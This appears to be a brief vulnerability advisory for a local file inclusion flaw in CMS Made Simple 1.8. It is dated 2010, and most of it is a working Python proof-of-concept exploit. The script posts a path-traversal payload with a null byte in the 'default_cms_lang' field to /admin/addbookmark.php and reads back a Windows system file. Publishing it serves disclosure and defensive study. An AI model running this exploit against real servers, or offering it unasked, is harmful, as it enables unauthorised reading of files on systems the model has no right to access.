Search
Software Vulnerability Tested On Date
CMS Made Simple 1.8 Local File Inclusion Windows Vista + XAMPP 7/11/2010
Description
A vulnerability in CMS Made Simple 1.8 can be exploited to include arbitrary files.
Proof of Concept
import httplib, urllib

host = 'localhost'
path = '/cmsms'

lfi = '../' * 32 + 'windows/win.ini\x00'

c = httplib.HTTPConnection(host)
c.request('POST', path + '/admin/addbookmark.php',
          urllib.urlencode({ 'default_cms_lang': lfi }),
          { 'Content-type': 'application/x-www-form-urlencoded' })
r = c.getresponse()

print r.status, r.reason
print r.read()